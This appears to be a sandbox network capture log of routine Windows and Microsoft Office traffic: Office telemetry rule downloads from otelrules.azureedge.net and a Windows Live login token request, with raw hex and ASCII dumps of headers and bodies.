                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC1468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6
                                                                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                83192.168.2.54985913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:32 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:33 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 3c5c3d60-c01e-0066-4c9e-26a1ec000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210233Z-16849878b78p8hrf1se7fucxk800000006c000000000q6r1
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                84192.168.2.54986013.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:33 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 9a8e6971-501e-0078-586f-2806cf000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210233Z-15b8d89586flspj6y6m5fk442w0000000b8g00000000mqa2
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                85192.168.2.54986113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:33 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 9016a745-201e-0096-70e6-25ace6000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210233Z-16849878b78fhxrnedubv5byks00000003y00000000088sb
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                86192.168.2.54986213.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:33 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 485
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 0a5cb2df-e01e-0071-6f67-2708e7000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210233Z-r197bdfb6b48pl4k4a912hk2g400000004v0000000002173
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                87192.168.2.54986413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:33 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:33 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 411
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 8e6d5db5-101e-0017-4c27-2747c7000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210233Z-16849878b78j7llf5vkyvvcehs00000006s00000000012h0
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                88192.168.2.54986320.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 3592
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:34 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_BL2
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: b7c59aa7-1697-460d-b2d3-e7a715a1705d
                                                                                                                                                                                                                                                                                                                                PPServer: PPV: 30 H: BL02EPF0001D86B V: 0
                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:33 GMT
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Length: 11392
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                89192.168.2.54986513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:34 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 470
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: c1ca1df0-401e-0029-1e3a-269b43000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210234Z-17c5cb586f6w4mfs5xcmnrny6n000000077g0000000097ua
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                90192.168.2.54986613.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:34 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:34 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: a342e9ea-d01e-0066-419c-27ea17000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210234Z-16849878b78qwx7pmw9x5fub1c00000003m000000000vkkq
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
